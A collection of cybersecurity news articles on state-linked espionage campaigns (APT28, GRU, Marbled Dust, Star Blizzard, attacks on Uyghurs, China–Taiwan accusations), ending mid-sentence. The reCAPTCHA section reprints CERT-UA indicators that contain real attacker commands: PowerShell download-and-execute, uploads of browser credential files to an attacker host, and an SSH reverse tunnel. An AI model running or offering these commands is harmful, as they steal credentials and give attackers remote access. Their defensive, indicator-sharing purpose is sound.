Espionage News

Russia-linked hackers are back at it again, this time with upgraded tools and a stealthier playbook targeting Ukrainian government systems. Ukraine’s national Computer Emergency Response Team has linked a recent cyberattack campaign against the information and communication system (ICS) of a government entity to UAC-0001—also known as APT28 or Fancy Bear—the infamous hacking group believed to be operated by Russia’s GRU military intelligence service. Also read: Russian GRU Is Hacking IP Cameras and Logistics Firms to Spy on Aid Deliveries from Western Allies to Ukraine In an investigation conducted between March and May 2024, cybersecurity responders uncovered two previously unseen malware strains—BEARDSHELL and SLIMAGENT—lurking inside government systems. The attackers also deployed a component of the widely known COVENANT command-and-control framework, hidden inside a document titled “Act.doc” and sent via the encrypted messaging app Signal. While the initial infection vector wasn’t immediately clear, analysts later discovered the malware reached its target using a macro-laced Word document that installed multiple payloads—each designed to fly under the radar, exploit trusted services, and maintain persistence through registry hijacking and scheduled tasks. How the Intrusion Worked Against Ukrainian Government Systems The attackers disguised their malware inside a seemingly benign Word file delivered over Signal. Sample of communication with an attacker in Signal (Source: CERT-UA) If a user enabled macros, the document executed code that placed two files on the system and set up a COM-hijacking registry entry that hijacked explorer.exe to silently launch a malicious DLL. That DLL then decrypted another file (windows.png) containing shellcode that finally triggered the launch of the COVENANT malware framework—all without dropping anything directly visible to the user. COVENANT, a .NET-based red team tool popular in the post-exploitation phase of cyberattacks, was used here to download and execute PlaySndSrv.dll and a WAV file (sample-03.wav), which contained encoded instructions to ultimately launch BEARDSHELL—a custom-built backdoor. Persistence? Also covered. BEARDSHELL maintained access through a separate registry entry tied to a scheduled task under Microsoft’s SystemSoundsService. Classic APT28. What Do BEARDSHELL and SLIMAGENT Actually Do? Both malware tools were written in C++ and designed for stealth and data collection: BEARDSHELL connects to the attacker using the API of Icedrive, a legitimate cloud storage provider, allowing the malware to receive encrypted PowerShell scripts and exfiltrate data without triggering traditional security tools. Each infected system gets its own directory, named using a unique hash derived from hardware and system identifiers. SLIMAGENT takes periodic screenshots and encrypts them using AES + RSA, saving them locally in a time-stamped format. It’s the visual spy in the room, quietly recording the screen without alerting the user. What’s particularly clever—and dangerous—about both tools is their use of legitimate services (Koofr and Icedrive) as command-and-control (C2) infrastructure. This means they avoid sketchy IP addresses and domains, making traditional threat intel blacklists nearly useless. Why It Matters This latest campaign isn’t just another cyberattack—it’s part of an escalating pattern of hybrid warfare tactics employed by Russia since the start of its war in Ukraine. APT28, which has been tied to the DNC email leaks in 2016, Olympic Destroyer in 2018, and countless attacks on NATO and EU institutions, is one of the Kremlin’s most active cyber units. Also read: ‘I’m not a Robot’ reCAPTCHA Trojanized by Russian Hackers to Target Local Ukrainian Government Their tactics have evolved. Instead of brute-forcing their way into systems, they now leverage phishing documents, encrypted messaging apps like Signal for payload delivery, and trusted APIs for communication. And they’re still targeting the same kind of critical government infrastructure they’ve always sought to undermine. According to CERT-UA, the malware was identified inside a central government executive body’s information systems—a clear sign that the group is targeting the upper echelons of Ukraine’s state apparatus. Defense, Detection, and the Cloud API Problem CERT-UA is urging security teams—particularly within governments and critical infrastructure—to closely monitor traffic to app.koofr.net and api.icedrive.net, as these are being used as C2 endpoints. The advisory also noted that success of the attack hinged on: Users enabling macros in Office documents Host security tools failing to monitor Signal-based delivery The abuse of trusted services like Icedrive and Koofr as “invisible” control channels It’s another wake-up call: endpoint defenses can’t rely on static indicators. Malware is now using your everyday apps, cloud platforms, and registry entries to hide in plain sight. The Bigger Picture APT28 has always stayed ahead of the curve—and this campaign is no exception. By chaining together macro payloads, registry hijacking, cloud C2, and multi-stage execution, the group isn’t just adapting. It’s evolving. And while these attacks may seem targeted at Ukraine, the tactics, techniques, and procedures (TTPs) on display should concern every government and enterprise organization in the West. Because if a Word doc, a PNG, and a WAV file can bypass your defenses, what else is already lurking inside?

In a joint cybersecurity advisory issued today, U.S. and allied intelligence agencies confirmed what many threat analysts have long suspected: the Russian GRU military intelligence agency is systematically targeting the digital backbone of logistics and transportation providers across Europe and North America. The campaign, detailed in a 25-page report from the NSA, FBI, CISA, and partners from 10 countries, including the U.K., Australia, and Germany, spotlights a coordinated cyber espionage effort by GRU’s Unit 26165—more widely recognized in the threat intel world as APT28, Fancy Bear, or Forest Blizzard. Targets at the center of the campaign were freight operators, rail networks, air traffic systems, and cloud tech vendors—anyone with a role in getting military and humanitarian aid to Ukraine. Targets have included organizations in 14 countries, including IP cameras in Hungary, a Russian ally. Russian GRU Campaign Not Just Malware — Surveillance Too What stands out in the report is the scale and creativity of the GRU’s tactics. The hackers aren’t just hijacking email servers or pushing trojans. They’re hacking into IP cameras, too—10,000 of them, to be exact—mostly around Ukrainian borders, using weak credentials and exposed RTSP services to turn physical surveillance into digital eyes on the ground. List of countries where IP cameras were targeted. (Source: defense.gov) In parallel, GRU operators launched targeted intrusions on shipping and logistics companies, exploiting familiar weaknesses like unpatched Exchange servers, WinRAR bugs (CVE-2023-38831), and Outlook NTLM leaks (CVE-2023-23397). The aim was stealing shipment manifests, routing info, and sensitive business data that could tip off troop or equipment movement. The combination of shipping data theft and compromised video feeds likely gives attackers real-time visibility into what’s moving, where, and when. It’s tactical intelligence collection at enterprise scale. The GRU Malware Stack The HEADLACE backdoor, first reported by IBM X-Force during the Israel-Hamas conflict, was found embedded in malicious shortcut files. Once activated, it initiated headless browser sessions to exfiltrate stolen data, clear logs, and maintain access. Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats MASEPIE, a Python-based backdoor, offered remote shell access, file transfers, and command execution capabilities, often disguised as routine background processes. Another tool, STEELHOOK, enabled credential harvesting from browsers like Chrome and Edge by decrypting stored passwords using PowerShell-based techniques. The actors also employed LOLBins—legitimate system tools like ntdsutil, wevtutil, and ADExplorer—to evade detection and live off the land. In one case, GRU hackers gained control of an ICS vendor’s email platform, then pivoted to compromise customers in the railway sector. In another, they used stolen credentials and MFA fatigue techniques to access VPN infrastructure at a shipping company. What the Russian GRU Wants This isn’t a smash-and-grab ransomware operation. It’s long-term surveillance. The kind of campaign that’s designed to persist, quietly gather intelligence, and interfere only when necessary. And while the report doesn’t explicitly name any targets by company, the industries hit hardest—logistics, transportation, and defense-adjacent vendors—are the same ones that move military hardware, humanitarian supplies, and critical infrastructure parts into conflict zones. The big concern? These compromised networks could give Russia a battlefield edge—intercepting aid, sabotaging supply lines, or simply watching to see how the West moves. How Companies Should Respond The advisory includes a laundry list of technical mitigations, including: Blocking known C2 infrastructure Hardening VPN and email access Reconfiguring exposed IP cameras Patching known exploited vulnerabilities (especially in Outlook, Exchange, and WinRAR) Monitoring PowerShell use and system tool abuse But there’s also a broader message: if you’re in the logistics or defense supply chain, and especially if you support Ukraine—even indirectly—you’re already a target. Organizations in these sectors should assume compromise and act accordingly, the advisory suggests. The Big Picture Russia’s digital playbook in Ukraine is evolving. While early campaigns relied on headline-grabbing wipers and power grid attacks, the new frontier is far more strategic—and far more subtle. What we’re seeing now is cyberwar as surveillance: fewer fireworks, more cameras. The GRU isn’t just breaking things—it’s watching, learning, and waiting. And for companies moving cargo or manufacturing gear with ties to conflict zones, that means cybersecurity is no longer just a compliance issue. It’s operational security. It’s national security.

When a zero-day flaw surfaces in an enterprise tool that no one talks about publicly, it’s tempting to write it off as niche. But Marbled Dust’s recent campaign exploiting CVE-2025-27920 in Output Messenger is anything but. Microsoft Threat Intelligence has linked a string of targeted cyberattacks to Marbled Dust, a Türkiye-affiliated threat actor, using a previously unknown vulnerability in Output Messenger—a self-hosted enterprise chat app. The campaign, ongoing since April 2024, targeted Kurdish military-linked users in Iraq and reflects a growing shift in how regionally motivated cyber-espionage unfolds. Output Messenger: The Tool You Didn’t Expect to Matter Output Messenger isn’t WhatsApp or Slack. It’s a low-profile, multiplatform chat tool often used by organizations looking for on-prem communication. That makes it a perfect blind spot—not widely scrutinized, but widely trusted within internal networks. Marbled Dust saw the opportunity and pounced. The attackers used CVE-2025-27920—a directory traversal flaw in Output Messenger Server Manager—to plant malicious scripts in the startup folder. From there, they executed a stealthy multi-stage backdoor deployment, with exfiltration domains and C2 infrastructure cleverly masked under seemingly benign domains like api.wordinfos[.]com. Microsoft credits Srimax, Output Messenger’s vendor, for releasing timely patches (v2.0.62+), but many organizations are still unpatched. That’s where Marbled Dust gets its access. Inside the Marbled Dust Attack Chain The campaign starts with Marbled Dust gaining authenticated access to Output Messenger’s Server Manager. Microsoft isn’t entirely sure how those credentials are initially harvested, but suspects DNS hijacking and typo-squatted login portals—tactics the group has used before. Marbled Dust Attack Chain (Source: Microsoft Threat Intelligence) Once in, the threat actor uploads a malicious VBS file to the Windows startup folder, exploiting the directory traversal bug. This script launches OMServerService.exe, a GoLang backdoor disguised as a legitimate service file. GoLang offers a bonus: platform agnosticism and fewer signature-based detections. The backdoor connects to Marbled Dust’s C2 domain, checks connectivity, sends host data, and then executes further commands based on what the attacker sends back. In one case, a victim’s device was seen uploading sensitive files packaged in a RAR archive using PuTTY’s command-line client, plink.exe, as the data exfiltration vehicle. On the client side, users who downloaded infected Output Messenger installers got more than they expected. The installer bundled the legit OutputMessenger.exe with a secondary payload—OMClientService.exe, another GoLang backdoor pinging the same C2 endpoint. Who Is Marbled Dust? Microsoft links Marbled Dust to past DNS hijacking and credential-harvesting campaigns. The group overlaps with activity known as Sea Turtle (APT) and UNC1326, and has been observed targeting organizations with interests adverse to Ankara’s. Their focus areas include the Middle East and Europe, with recent emphasis on telecom and government sectors. This campaign signals a shift. While earlier Marbled Dust activity relied on known vulnerabilities, the use of a true zero-day suggests either growing internal capabilities or increased urgency in their operational objectives. Why The Output Messenger Exploit Matters This is a lesson in how fringe enterprise tools can become high-value targets. While most security teams are busy patching the usual suspects (Office macros, web proxies, VPNs), tools like Output Messenger quietly hum along in the background—until someone like Marbled Dust takes interest. And let’s be clear: this isn’t a commodity threat. It’s regional espionage with carefully picked targets and minimal noise. The entire campaign operated with precision, focused on credential theft, internal surveillance, and quiet access—not ransomware or mass disruption. What You Should Do Now Microsoft urges immediate patching of Output Messenger to versions 2.0.62 (server) and 2.0.63 (client). Organizations using this app should: Audit all current installations for signs of the exploit (look for unusual VBS and EXE files in startup directories) Monitor outbound connections to api.wordinfos[.]com Check for unauthorized use of plink.exe or outbound SSH sessions Isolate any systems communicating with suspicious C2 infrastructure Marbled Dust’s campaign isn’t about splashy headlines. It’s quiet, focused, and a warning shot to organizations using obscure enterprise software without hardening them. Zero-days don’t just live in browsers and VPNs anymore. They live in your internal chat apps, your ticketing systems, your software you forgot to watch. And attackers? They’re watching all of it.

A trusted tool has turned traitor. A new Citizen Lab investigation reveals that UyghurEditPP, a legitimate open-source Uyghur-language text editor, has been weaponized to spy on members of the World Uyghur Congress (WUC). The attack, uncovered in March 2025, shows how threat actors have now shifted to exploiting trusted cultural tools to launch cyber-espionage campaigns against diaspora communities. The attack started the old-fashioned way – with an email. WUC members received a spearphishing message posing as a partner organization. It offered what seemed like an innocuous task – download and test a Uyghur-language software tool. The email contained a Google Drive link to a password-protected archive. Inside? A booby-trapped version of UyghurEditPP. The trojanized app looked and behaved like the real deal, right down to its interface. But hidden under the hood, it deployed malware designed to quietly burrow into the victims’ systems. Once installed, it could scoop up system information, upload or download files, and even run custom plugins for more complex operations. A Custom Backdoor with a Uyghur Disguise Citizen Lab’s technical teardown showed that the malware communicated with its command-and-control (C2) servers using domains like tengri.ooguy.com and anar.gleeze.com, borrowing heavily from Central Asian cultural references. These servers were hosted inside a cloud provider known for lax controls and frequent abuse by cybercriminals. Adding to the deception were servers that presented fake TLS certificates impersonating Microsoft. It’s a clever ploy – browsers and security software often treat familiar certificates with less suspicion, helping the malicious traffic fly under the radar. Not Just a One-Off: Evidence of Long-Term Planning This wasn’t a quick-and-dirty operation. The attackers set up websites like gheyret.com and gheyret.net, designed to look like they belonged to Uyghur software developers. They even faked download pages for UyghurEditPP to make the malicious file seem legitimate. Citizen Lab researchers believe the campaign reflects a high level of planning and resource investment, likely showing a long-term commitment to infiltrating Uyghur communities through digital means. Also read: Global Cybersecurity Agencies Warn of Spyware Targeting Uyghur, Tibetan, and Taiwanese Communities Bigger Than One Organization While this particular campaign targeted WUC, it’s part of a broader pattern of digital transnational repression. Over the past decade, multiple investigations have documented attempts to harass, monitor, and silence Uyghur activists and dissidents abroad. The methods vary. From phishing attacks and spyware campaigns to social engineering and disinformation, threat actors have consistently adapted their tactics. The latest twist—weaponizing culturally significant software—is a troubling evolution. By hijacking trusted tools, attackers erode the very foundations of community trust. It’s akin to someone weaponizing your own language. It’s psychological warfare, not just technical. “Targets have reported experiencing feelings of insecurity, guilt, fear, uncertainty, mental and emotional distress, and burnout from these attacks,” the Citizen Lab researchers said based on earlier similar investigations. Inside the Malware’s Playbook According to Citizen Lab’s technical findings, the backdoor bundled with UyghurEditPP was no ordinary spyware. It featured modular plugins, allowing attackers to tailor their operations based on the target. Among its core capabilities: System profiling: Collects information about the infected device File operations: Uploads, downloads, and executes files Command execution: Runs arbitrary system commands on demand Custom plugins: Expands functionality without redeploying new malware By blending legitimate software functionality with covert surveillance capabilities, the attackers achieved a potent balance of usability and stealth. Attribution: A Familiar Playbook, An Unknown Actor Citizen Lab stopped short of directly attributing the attack to a known government or hacking group. However, the techniques, targets, and infrastructure bear a strong resemblance to past China-aligned cyber operations aimed at Uyghur individuals and organizations. This campaign’s sophistication suggests access to considerable resources and a deep understanding of Uyghur cultural dynamics—both hallmarks of state-sponsored cyber-espionage. Digital Safety Lessons for At-Risk Communities The WUC attack is a wake-up call not just for Uyghur activists but for every marginalized or targeted community online. Trust, once broken, is hard to rebuild. Software—even familiar, open-source tools—must now be treated with a layer of healthy skepticism. Citizen Lab advises: Verify downloads: Always source software directly from official repositories, not third-party links. Use endpoint protection: Invest in reputable antivirus and behavior-monitoring tools. Employ two-factor authentication: Harder for attackers to hijack accounts, even with malware present. Stay updated: Keep systems patched and subscribe to cybersecurity advisories relevant to your community. The Personal Cost of Cyber-Conflict Cyberattacks like this one aren’t just technical skirmishes. They’re personal. They target trust, language, identity—the invisible threads that hold communities together. Weaponizing UyghurEditPP shows a level of creativity and cruelty. It’s a digital assault on an already persecuted community, designed to monitor, intimidate, and ultimately control. As this campaign shows, defending against cyberthreats isn’t just about firewalls and patches. It’s also about defending culture, community, and the very right to communicate safely.

China has accused four Taiwanese individuals of being hackers associated with Taiwan’s military cyber force, claiming they were responsible for cyberattacks against Beijing. The Ministry of State Security (MSS) identified them as members of Taiwan’s Information, Communications, and Electronic Force Command (ICEFCOM), publishing their names, photographs, birthdates, and job titles. The accusations add another layer of tension between the two nations as tensions between the two nations continue to remain hostile. China’s Allegations Against Taiwan’s ICEFCOM According to China’s MSS, ICEFCOM has been involved in cyberattacks targeting China’s critical infrastructure. The ministry stated that Taiwan’s cyber force, also known as the “Internet Army” has been working with external hackers and cybersecurity firms to launch cyber espionage and infiltration campaigns. “Their activities include espionage, sabotage, and propaganda,” the MSS said. Since its establishment, ICEFCOM has conducted targeted cyberattacks and infiltration operations against critical Chinese infrastructure, the MSS stated in an official release. China claimed that the attacks focused on systems controlling waterworks, power grids, telecommunications networks, and surveillance cameras, aiming to disrupt national stability. The MSS also accused ICEFCOM of attempting to breach databases containing sensitive information on Chinese citizens, government officials, and military operations. Beijing labeled these activities as part of Taiwan’s broader intelligence-gathering efforts, allegedly backed by foreign entities. Taiwan Rejects Claims, Calls China the Real Cyber Aggressor Taiwan’s Ministry of National Defense swiftly rejected China’s accusations, calling them an attempt to shift blame. Taiwan has repeatedly stated that its cyber units focus on defensive measures rather than offensive operations. The military’s cybersecurity forces do not engage in cyberattacks, Taiwan’s defense ministry said in a statement. Taipei accused Beijing of fabricating claims to justify its own cyber activities against Taiwan. Taiwan recently released its own report detailing Beijing’s cyber tactics over the past year. Taiwan’s National Security Bureau (NSB) stated that cyberattacks against Taiwan’s government departments averaged 2.4 million per day in 2024. The report suggested that China’s state-sponsored hackers have been refining their cyber warfare techniques to exert political and economic pressure on Taipei. China’s Cyberattack Techniques in 2024 Taiwan’s NSB report outlined the key methods China used in its cyber operations throughout 2024. The tactics ranged from phishing campaigns to large-scale data breaches designed to compromise government and military networks. One of the primary strategies involved Advanced Persistent Threat (APT) groups linked to the Chinese government. These groups infiltrated Taiwanese organizations using malware-laced emails and trojanized software updates. Some of the most sophisticated attacks targeted supply chain vendors, allowing hackers to bypass traditional security measures and infiltrate government networks undetected. China also leveraged artificial intelligence (AI)-driven cyber tools to automate large-scale attacks. AI-enhanced malware adapted in real time, making it harder for cybersecurity teams to detect and neutralize threats. The NSB report noted that China’s hackers used generative AI models to craft realistic phishing emails that closely mimicked official government communications, deceiving even experienced professionals. Another concerning development was China’s increasing use of zero-day exploits—previously unknown software vulnerabilities that hackers used before they could be patched. Beijing’s cyber units deployed these exploits against Taiwan’s critical infrastructure, targeting national defense systems, financial institutions, and telecom providers. Growing Cyber Conflict Between Beijing and Taipei Taiwan has long been a focal point of Chinese cyber operations, but the scale and sophistication of attacks in 2024 marked a significant escalation following the physical tensions between the two nations. Chinese hackers reportedly infiltrated multiple Taiwanese defense contractors, attempting to extract classified military research and technology blueprints. The growing cyber conflict has also impacted Taiwan’s private sector. The NSB noted that Chinese threat actors carried out ransomware attacks against Taiwanese semiconductor firms, aiming to disrupt one of the world’s most crucial industries. Additionally, Beijing allegedly sought to manipulate Taiwanese social media platforms, spreading disinformation to sway public opinion ahead of key political events. With China publicly accusing Taiwan of cyberattacks and Taiwan providing detailed evidence of Beijing’s own operations, tensions in cyberspace continue to rise. Both nations remain locked in a digital conflict where information warfare plays a crucial role in their broader geopolitical struggle. China’s allegations against Taiwan come amid an increasingly hostile landscape in the Asia-Pacific region. While Beijing has labeled Taiwan’s ICEFCOM as a cyber threat, Taipei maintains that China is the real aggressor, orchestrating millions of daily attacks. Taiwan’s latest findings reveal that China’s cyber capabilities are evolving rapidly, incorporating AI, zero-day exploits, and supply chain attacks to gain strategic advantages. As cyberwarfare becomes a critical battleground, both nations are likely to continue investing in offensive and defensive cyber capabilities, experts suggest.

After researchers and national cybersecurity agencies revealed key details of Russia-linked Star Blizzard threat actor in recent days, the group adds a new attack vector to its arsenal that targeted victims’ WhatsApp data. Microsoft’s Threat Intelligence team spotted the campaign late last year, leveraging the topic of support to Ukrainian NGOs in the face of the ongoing war. Star Blizzard, also tracked as Callisto, SEABORGIUM, or COLDRIVER, is run by Russia’s FSB or secret service officers, according to previous attribution. The group is famously known for its targeted spear-phishing campaigns against high profile targets in the U.S. and U.K., where they have targeted dozens of journalists, think tanks, and non-governmental organizations that support Ukraine and its allies. Also read: Russia Backed Star Blizzard’s Infiltration Attempts in UK Elections Laid Bare Star Blizzard Shifts Focus to WhatsApp Data Historically, the threat actor is known to use phishing campaigns for initial infection. But detailed advisories from independent cybersecurity firms like Microsoft’s Threat Intelligence team and agencies like the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which exposed the TTPs of this threat actor has likely forced them to change its tradecraft to evade detection. Star Blizzard has now modified it spear-phishing campaign to target the WhatsApp accounts of its victims rather than their computer data. This is the first time that the threat actor has adopted a new technique, researchers said. The threat actor initiates contact via email, engaging targets before sending a follow-up email with a malicious link. The sender address impersonates a U.S. government official, consistent with Star Blizzard’s tactic of mimicking political or diplomatic figures to boost credibility. Image: Initial Spear-Phishing mail from Star Blizzard (Credit: MSTIC) The initial email includes a QR code claiming to direct users to a WhatsApp group focused on supporting Ukraine NGOs. However, the QR code is intentionally broken to prompt the recipient to respond. Upon response, the threat actor sends a second email containing a Safe Links-wrapped t[.]ly shortened link as an alternative to join the group. Following this link redirects the target to a page instructing them to scan a QR code to join the group. In reality, the QR code connects the victim’s WhatsApp account to the threat actor’s device via WhatsApp Web. This grants the attacker access to the victim’s messages, enabling data exfiltration through browser plugins designed for exporting WhatsApp messages. Microsoft noted that although the campaign ended in November 2024, people and organizations, especially those related to the government or diplomacy, defense, research and assistance to Ukraine in the ongoing conflict with Russia, need to be vigilant and educated of these change in tactics. “We are sharing our information on Star Blizzard’s latest activity to raise awareness of this threat actor’s shift in tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity,” Microsoft said.

Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard—a new technique for delivering malware with minimal interaction. Google’s reCAPTCHA Lookalike Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user’s clipboard. Following this, instructions prompt users to press “Win+R,” which opens the command prompt, followed by “Ctrl+V” to paste and then “Enter” to execute it. Once executed, the payload launches, compromising the system. The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA) APT28’s tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects involves the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly getting popular among threat actors. Fancy Bear Gets Fancy with its Expanding Arsenal This isn’t the first time Ukrainian entities faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data. The malicious scripts run post Roundcube vulnerability exploitation (Source; CERT-UA) Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout of increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks. Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats Indicators of Compromise Shared by CERT-UA File Hashes: e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1   d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1   597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta   446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT] f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe   981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa   d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit)   d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit) Network: hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document (tcp)://mail.zhblz[.]com:8443 hXXps://mail.zhblz[.]com hXXps://mail.zhblz[.]com/B hXXps://mail.zhblz[.]com/b hXXps://mail.zhblz[.]com/endpoint hXXps://mail.zhblz[.]com/upload hXXps://mail.zhblz[.]com/z hXXps://mail.zhblz[.]com/id_rsa hXXps://mail.zhblz[.]com/libcrypto hXXps://mail.zhblz[.]com/ssh (tcp)://203[.]161.50.145:22 (tcp)://203[.]161.50.145:6211 (tcp)://45[.]61.169.221:445 doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com mail.zhblz[.]com 203[.]161.50.145     45[.]61.169.221      Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes) 103[.]50.33.50 103[.]50.33.54 109[.]236.63.165 185[.]197.248.94 194[.]35.121.200 194[.]35.121.202 194[.]35.121.50 195[.]64.155.64 198[.]54.117.242 203[.]161.50.145 37[.]19.218.144 37[.]19.218.146 37[.]19.218.156 37[.]19.218.157 37[.]19.218.160 37[.]19.218.168 37[.]19.218.174 37[.]19.218.183 45[.]155.43.118 45[.]155.43.121 45[.]94.211.159 45[.]94.211.161 45[.]94.211.164 80[.]77.25.206 95[.]214.216.76 95[.]214.216.78 95[.]214.217.94 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 exchangelib/5.4.2 (python-requests/2.32.3) Hosts: %APPDATA%\id_rsa %APPDATA%\zapit.exe %APPDATA%\ssh.exe %APPDATA%\libcrypto.dll C:\Users\Malgus\source\repos\rdp\rdp\obj\Debug\rdp.pdb mshta https://mail.zhblz.com/b ssh recaptcha@203.161.50.145 -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no -o “PermitLocalCommand=yes” -o “LocalCommand=ssh -i \\45.61.169.221\key.pem user@1.1 .1.1” %APPDATA%\ssh.exe recaptcha@203.161.50.145 -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no powershell -WindowStyle Hidden -nop -exec bypass -c “iex (New-Object Net.WebClient).DownloadString(‘https://mail.zhblz.com/B’);pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ”I am not a robot – reCAPTCHA ID: {verification_id}”” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename=’logins.json’;file='<Base64EncodedData> ‘}|ConvertTo-Json) -ContentType ‘application/json'” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename=’key4.db’;file='<Base64EncodedData> ‘}|ConvertTo-Json) -ContentType ‘application/json'” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%\libcrypto.dll” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%\ssh.exe” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%\zapit.exe” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATA\id_rsa”  

Washington’s narrative – corroborated by Microsoft’s findings – of the China-linked Volt Typhoon group is just a cover for U.S. intelligence hacking into Chinese infrastructure, a 60-page report from Beijing’s top cyber defense agency charged. The report, released on Monday by the National Computer Virus Emergency Response Center (CVERC), accused the U.S. government of meticulously crafting a disinformation campaign aimed at both misdirecting attention and maintaining dominance in the global cyber arena. The allegations point to deep-rooted strategies used by the U.S. to perpetuate its cyber espionage activities while blaming adversaries like China and Russia. But behind the noise lies a much more intricate revelation of cyber warfare tactics, including the use of False Flag operations and stealth tools designed to mask the true origins of these attacks, the report alleges. The ‘Marble’ Toolkit and False Flag Tactics At the center of the accusations is a U.S. intelligence toolkit that China calls “Marble.” This tool allegedly helps cloak the true source of cyberattacks by obfuscating the coding signatures typically used to trace attackers. What makes Marble particularly dangerous, according to China’s report, is its ability to insert foreign language strings into the malware code—languages like Mandarin and Russian—to mislead investigators and pin the blame on foreign actors. False Flag operations, a tactic where one country carries out attacks disguised as another, have become central to modern cyber warfare, China said. In the digital realm, this tactic aims to confuse attribution, the process by which investigators link a cyberattack to its origin. With attribution often serving as the basis for geopolitical decisions, misdirection on this scale could have serious consequences. Influence Operations and Cyber Dominance The allegations don’t stop at cyberattacks alone. According to CVERC’s investigation, the U.S. has woven these tactics into a broader strategy of influence operations. These operations aim to shape perceptions, spread disinformation, and destabilize target nations. They go beyond the battlefield of bits and bytes, extending into media and public discourse. The report claims the U.S. employs a framework of 4D principles—deny, disrupt, degrade, deceive—to maintain control over the narrative in cyberspace. These principles, seen in disinformation campaigns like Volt Typhoon, are designed to manipulate how cyberattacks are perceived, allowing the U.S. to downplay its own activities while amplifying those of its adversaries. China also came down heavily on the usage of naming conventions like “Panda” and “Dragon” used in the attribution of China-linked threat actors, claiming it is geopolitically motivated and equivalent to racial targeting. Some U.S. companies, such as Microsoft and CrowdStrike, for their commercial interest and without sufficient evidence and rigorous technical analysis, have been keen on coining various absurd codenames with obvious geopolitical overtones for hacker groups, such as ‘typhoon,’ ‘panda,’ and ‘dragon,’ instead of ‘Anglo-Saxon,’ ‘hurricane,’ and ‘koala,'” the CVERC report said. Global Surveillance: The ‘UpStream’ and ‘Prism’ Projects The core of the accusations against the U.S. is its alleged use of mass surveillance projects, known as “UpStream” and “Prism,” which work together to siphon vast amounts 